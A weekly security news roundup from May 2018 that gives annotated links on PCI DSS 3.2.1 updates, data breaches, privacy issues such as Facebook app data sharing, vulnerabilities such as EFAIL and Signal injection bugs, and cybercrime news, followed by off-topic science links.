Welcome to This Week’s [in]Security. We’ve collected and grouped together a selection of this week’s news, opinions, and research. Quickly skim these annotated links organized by topic: compliance and payment security, breaches, regulation, bugs, privacy, hacking/malware, other security & risk, and more. We hope you enjoy and find them useful.

PCI Compliance and Payments

• PCI DSS 3.2.1 is out. Change summary https://www.pcisecuritystandards.org/documents/PCIDSSSummaryofChanges_3-2-1.pdf , updated standard https://www.pcisecuritystandards.org/documents/PCIDSSv3-2-1.pdf.
• PCI Q&A on PCI DSS 3.2.1.  The reporting templates and SAQ’s will be published in June. Note that while there are no added requirements to the DSS, SAQ-A will be changing to address patching of redirection servers https://blog.pcisecuritystandards.org/pci-dss-now-and-looking-ahead

• PCI has updated the Technical FAQ documents for several standards (Technical FAQs are typically mandatory rather than just informational):

  • PIN https://www.pcisecuritystandards.org/documents/PTSPINTechnicalFAQsv2May2018.pdf
  • PTS HSM https://www.pcisecuritystandards.org/documents/PTSHSMTechnicalFAQsv3May2018.pdf
  • PTS POI (terminals) https://www.pcisecuritystandards.org/documents/PTSPOITechnicalFAQsv5May2018.pdf
  • Card Production https://www.pcisecuritystandards.org/documents/CardProdSecurityRqrmtsFAQ__v2May2018.pdf 
  • Software PIN on COTS https://www.pcisecuritystandards.org/documents/SPoCTechnicalFAQs.pdf
• Researchers test measuring recording jitter as a method to detect clone magnetic stripe cards through https://krebsonsecurity.com/2018/05/detecting-cloned-cards-at-the-atm-register/

Breaches / Leaks

• Chili's hit by payment card breach using POS malware  https://www.zdnet.com/article/chilis-restaurant-chain-suffers-data-breach/
• Rail Europe North America suffers 3 month e-commerce breach including personal and payment card data https://www.darkreading.com/endpoint/rail-europe-notifies-riders-of-three-month-data-breach/d/d-id/1331800
• Equifax reverses original claimed no passport numbers were exposed in their mega-breach last year https://www.vox.com/business-and-finance/2018/5/10/17337260/equifax-data-breach-passports
• CBC reports a theft of computer equipment put at risk information on 20K current and historical employees and contractors, the report doesn't mention encryption http://www.cbc.ca/news/politics/cbc-privacy-breach-insurance-1.4665909
• The 407ETR reports data on 60K customers was leaked through internal theft and ended up being used for political recruiting. A former 407 employee has resigned as a provincial election candidate over possible linkage to the incident http://nationalpost.com/news/politics/internal-theft-of-data-on-60000-customers-of-ontarios-private-407-freeway-could-be-linked-to-pc-party-recruitment
• The growth industry in breaches continues to be in Healthcare https://www.databreachtoday.com/health-data-breach-tally-latest-additions-a-11013
• Suspected source of Wikileaks Vault 7 dump identified as an ex-CIA employee http://www.theregister.co.uk/2018/05/15/vault7leak/

Laws & Regulations / Standards

• Citizen Lab report releases report on the encryption debate https://citizenlab.ca/2018/05/shining-light-on-encryption-debate-canadian-field-guide/
• Patent revoked: victory in troll podcasting patent https://www.eff.org/deeplinks/2018/05/eff-wins-final-victory-over-podcasting-patent

Privacy

• Facebook update

  • Another Cambridge University researcher connected to the Cambridge Analytica researcher collected personality data on 6M users and shared half of it out https://www.databreachtoday.com/report-facebook-app-exposed-3-million-more-users-data-a-11009
  • 200 apps suspended https://www.darkreading.com/threat-intelligence/facebook-suspends-200-apps/d/d-id/1331794
  • 583M fake accounts closed in 2018Q1 https://www.theguardian.com/technology/2018/may/15/facebook-closed-583m-fake-accounts-in-first-three-months-of-2018
• EFF's Privacy Badger updated to take on link tracking a technique used by facebook and others  https://www.eff.org/deeplinks/2018/05/privacy-badger-rolls-out-new-ways-fight-facebook-tracking
• Supreme court rules privacy rights cannot be undermined by fine print https://www.eff.org/deeplinks/2018/05/supreme-court-says-your-expectation-privacy-probably-shouldnt-depend-fine-print
• Company providing cell phone location data to law enforcement without warrants https://www.schneier.com/blog/archives/2018/05/accessingcell\.html
• A bug in related companies service allowed anyone to locate a cell phone https://www.theregister.co.uk/2018/05/18/phonetrackerfoulup/

Bugs / Design Flaws

• More serious Adobe bugs https://www.theregister.co.uk/2018/05/14/adobecriticalfixes/
• The EFAIL vulnerability affects email clients using PGP and S/MIME and can exploit embedded HTML objects to ex-filtrate plain text copies of encrypted emails  https://www.schneier.com/blog/archives/2018/05/detailsona_ne.html
• Signal messaging app was patched to prevent remote code injection https://thehackernews.com/2018/05/signal-messenger-code-injection.html
• A second remotely executable network based Rowhammer attack in the last month https://thehackernews.com/2018/05/remote-rowhammer-attack.html
• A second remote injection bug in Signal with a week https://thehackernews.com/2018/05/signal-desktop-hacking.html

Hacking / Malware / Cybercrime

• Malware adopts recently identified "Doppelganger" technique for stealthy installation https://threatpost.com/variant-of-synack-malware-adopts-doppelganging-technique/131760/
• 5 Mexican banks defrauded through electronic transfers https://www.databreachtoday.com/mexico-investigates-suspected-cyberattacks-against-5-banks-a-11008
• Dark Overlord cybercrime group being rounded up https://www.databreachtoday.com/noose-tightens-around-dark-overlord-hacking-group-a-11014

Other Security / Risk

• Researchers sending inaudible commands to voice assistants have raised their game turning music and voice recordings into Trojan Horses https://www.schneier.com/blog/archives/2018/05/sending_inaudib.html
• Why you shouldn’t expose Remote Desktop (RDP) to the Internet https://www.darkreading.com/endpoint/the-risks-of-remote-desktop-access-are-far-from-remote/a/d-id/1331820
• New OWASP 2017 Top Ten play by play mini-course https://www.troyhunt.com/new-pluralsight-course-owasp-top-10-2017
• Windows 10 Spring update includes OpenSSH https://www.zdnet.com/article/openssh-arrives-in-windows-10-spring-update/
• Compromised credentials, the downside of biometrics https://www.theregister.co.uk/2018/05/17/theeyeshave_it/
• First Wales, now London. Police facial recognition system has high false positive rate and zero arrests https://www.theregister.co.uk/2018/05/15/metpoliceslammedinaccuratefacial_recognition/

Off-Topic

• The Gaia mission just unloaded data on 13K white dwarf stars within 300 light years of Earth - including evidence of mergers https://www.universetoday.com/139190/gaia-turns-up-13928-white-dwarfs-nearby-the-sun-including-several-formed-through-mergers/
• NASA's 2020 mission to Mars includes sending a helicopter to fly in the ultra-thin atmosphere! https://www.universetoday.com/139228/nasa-is-sending-a-helicopter-to-mars-as-part-of-the-2020-rover/
• Why Jet packs aren't really a big thing despite getting cooler https://www.theguardian.com/technology/2018/may/15/jetpacks-jet-propulsion-flying-to-work
• Pro's and Con's of various ways of travelling between stars https://www.universetoday.com/139215/pros-and-cons-of-various-methods-of-interstellar-travel/
• Alan Turing made a discovery in the field of chemistry that is improving desalination technology https://www.economist.com/news/science-and-technology/21741538-how-desalination-got-its-stripes-membrane-can-remove-salts-water-more
• Fast and permanent method of turning CO2 into stone may help fight global warming http://www.bbc.com/news/world-43789527